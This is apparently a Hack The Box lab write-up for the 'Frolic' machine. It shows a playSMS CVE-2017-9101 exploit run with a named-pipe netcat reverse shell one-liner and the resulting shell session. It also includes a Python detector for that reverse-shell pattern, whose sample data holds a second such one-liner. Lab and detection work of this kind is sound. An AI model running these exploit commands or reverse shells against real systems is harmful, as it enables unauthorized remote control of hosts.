Remote Code Execution


A playSMS instance has been confirmed under the /playsms directory on the target web server on port 9999, and a working credential was extracted after a lengthy de-obfuscation. While I have yet to confirm the version of the instance, [[Frolic_CVE-2017-9101#[Exploit](https://github.com/jasperla/CVE-2017-9101)|one of the more common exploits]] will be run here in the hope of achieving code execution on the target system.

┌──(kali㉿kali)-[~/archive/htb/labs/frolic]
└─$ python3 cve-2017-9101.py --username admin --password idkwhatispass --url http://$IP:9999/playsms --command 'mkfifo /tmp/vdma; nc 10.10.16.8 9999 0</tmp/vdma | /bin/sh >/tmp/vdma 2>&1; rm /tmp/vdma'
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
[*] Attempting to execute payload

Executing the exploit. The command passed with --command is a named-pipe reverse shell that calls back to the listener started below.

┌──(kali㉿kali)-[~/…/htb/labs/frolic/obfuscated]
└─$ nnc 9999             
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.111] 52360
whoami
www-data
hostname
frolic
ifconfig
ens33     link encap:Ethernet  HWaddr 00:50:56:b9:eb:ab  
          inet addr:10.10.10.111  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:ebab/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:ebab/64 Scope:Global
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:1231109 errors:354 dropped:1118 overruns:0 frame:0
          tx packets:1222287 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:194103450 (194.1 MB)  TX bytes:413532074 (413.5 MB)
          interrupt:19 Base address:0x2000 
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:53092 errors:0 dropped:0 overruns:0 frame:0
          tx packets:53092 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:3929104 (3.9 MB)  TX bytes:3929104 (3.9 MB)

Initial foothold established on the target system as the www-data user by exploiting CVE-2017-9101.
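As an added defender-side example (not part of the original walkthrough or the exploit repository), the named-pipe reverse shell one-liner used as the payload above has a recognisable shape in process telemetry. The Python below scans constructed command lines for that shape and reports the FIFO path, callback host, port and shell, while ignoring ordinary mkfifo or nc use; the function names, regexes and sample lines are my own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of process command lines, as a defender might collect
# them from `ps -eo args`, auditd EXECVE records or EDR telemetry. The first
# mirrors the payload in this walkthrough; the others are benign or near-miss
# noise showing that mkfifo or nc alone does not trigger the detector.
SAMPLE_CMDLINES = [
    "sh -c mkfifo /tmp/vdma; nc 10.10.16.8 9999 0</tmp/vdma | /bin/sh >/tmp/vdma 2>&1; rm /tmp/vdma",
    "nc -zv 10.10.10.111 80",
    "mkfifo /var/run/app/events.pipe",
    "bash -c 'mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 198.51.100.7 4444 >/tmp/f'",
    "/usr/sbin/apache2 -k start",
]

@dataclass
class FifoShellHit:
    fifo: str
    remote_host: str
    remote_port: int
    shell: str

FIFO_RE = re.compile(r"\bmkfifo\s+(?P<fifo>\S+)")
# netcat-style client with an explicit IPv4 host and port
NC_RE = re.compile(r"\b(?:nc|ncat|netcat)\b\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\b")
# a shell that is not merely the `sh -c` wrapper launching the whole one-liner
SHELL_RE = re.compile(
    r"(?:^|[\s;])(?P<shell>(?:/usr)?(?:/bin/)?(?:ba|z|da|k)?sh)(?!\s+-c\b)(?=\s|$)")

def detect_fifo_reverse_shell(cmdline: str) -> Optional[FifoShellHit]:
    """Flag one command line that creates a FIFO, connects out with nc and
    pipes that socket into a shell: the named-pipe reverse shell pattern."""
    fifo, nc, shell = FIFO_RE.search(cmdline), NC_RE.search(cmdline), SHELL_RE.search(cmdline)
    if not (fifo and nc and shell):
        return None
    path = fifo.group("fifo").rstrip(";")
    # The FIFO has to be reused as a redirect target, and the socket tool has to
    # sit in a pipeline with the shell; otherwise this is ordinary FIFO or nc use.
    if cmdline.count(path) < 2 or "|" not in cmdline:
        return None
    return FifoShellHit(path, nc.group("host"), int(nc.group("port")), shell.group("shell"))

def scan_cmdlines(cmdlines: List[str]) -> List[FifoShellHit]:
    """Run the detector over a batch of command lines and keep only the hits."""
    return [hit for hit in map(detect_fifo_reverse_shell, cmdlines) if hit]

if __name__ == "__main__":
    for hit in scan_cmdlines(SAMPLE_CMDLINES):
        print(f"reverse shell via FIFO {hit.fifo}: {hit.shell} <-> {hit.remote_host}:{hit.remote_port}")
```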